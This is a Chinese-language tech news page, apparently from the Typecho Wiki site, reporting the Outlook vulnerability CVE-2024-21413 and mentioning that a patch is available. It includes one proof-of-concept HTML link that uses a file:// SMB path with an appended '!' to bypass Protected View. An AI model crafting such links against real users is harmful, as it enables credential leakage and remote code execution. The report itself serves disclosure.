TYPECHO WIKI
每一个作品都值得被记录

敬告读者,感谢您对本站的支持,在今年10月份因Racknerd机房硬盘事故,导致本站静态文件全部丢失,包含主题插件网站图片等文件,TypechoWiki经过几次更换站长,凝结了多位站长的心血,如今因为大意只备份了数据库未及时备份静态文件而导致严重数据丢失事故,现已无力回天,经过深思我决定后续可能永久停更该网站,请各位读者寻求其它Typecho周边下载站,另外如果你对本站感兴趣也欢迎报价,我们愿意出售该站联系邮箱[email protected],目前该站的静态文件仅为2019年以前的版本,2019年以后的各位站长精心维护的插件和主题压缩包以及站内图片全部丢失!

加个“!”就能读取、写入和删除文档,微软 Outlook 被曝出严重漏洞

Typecho维基君站长快讯 • 196次浏览 • 发布 2024-02-16 • 更新 2024-02-16

微软近日发布安全公告,报告旗下的 Outlook 服务存在严重的远程代码执行漏洞,无需用户交互的情况下,只需要在 Outlook 超链接中添加“!”感叹号,就能读取相关机密文档。

加个“!”就能读取、写入和删除文档,微软 Outlook 被曝出严重漏洞

该漏洞追踪编号为 CVE-2024-21413,在 CVSS 风险评估中基础得分(根据漏洞的固有特征反映漏洞的严重程度)为 9.8(满分 10 分),时间得分(评价漏洞被利用的时间窗的风险大小)为 8.5 分(满分 10 分)。

该漏洞由 Check Point Research 的安全专家 Haifei Li 发现并报告,根据微软官方描述,攻击者可以在文档扩展名及其嵌入链接后插入感叹号,就能绕过安全程序获得文档的高级权限,包括编辑潜在的恶意 "保护视图" 文档。

如果文档中嵌入了带有 http 或 https 的超链接,Outlook 就会启动默认浏览器来显示它。例如:

<a href="skype:SkypeName?call">Call me on Skype</a>

加个“!”就能读取、写入和删除文档,微软 Outlook 被曝出严重漏洞

安全研究人员发现一个感叹号就足以绕过保护机制。下面的链接演示了这一点:

<a href="file///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

微软目前已经发布了 Office 补丁,修复了 CVE-2024-21413 漏洞,并推荐用户尽快安装。

用于 Office 2016(32 位版本)

For Office 2016(64 位版本)

附上该漏洞的更多相关链接,感兴趣的用户可以点击阅读:

广告声明:文内含有的对外跳转链接(包括不限于超链接、二维码、口令等形式),用于传递更多信息,节省甄选时间,结果仅供参考,Typecho.Wiki所有文章均包含本声明。
厂商投放

【腾讯云】🎉五一云上盛惠!云服务器99元/月续费同价!

腾讯云五一劳动节海量产品 · 轻松上云!云服务器首年1.8折起,买1年送3个月!超值优惠,性能稳定,让您的云端之旅更加畅享。快来腾讯云选购吧!

广告
添加新评论 »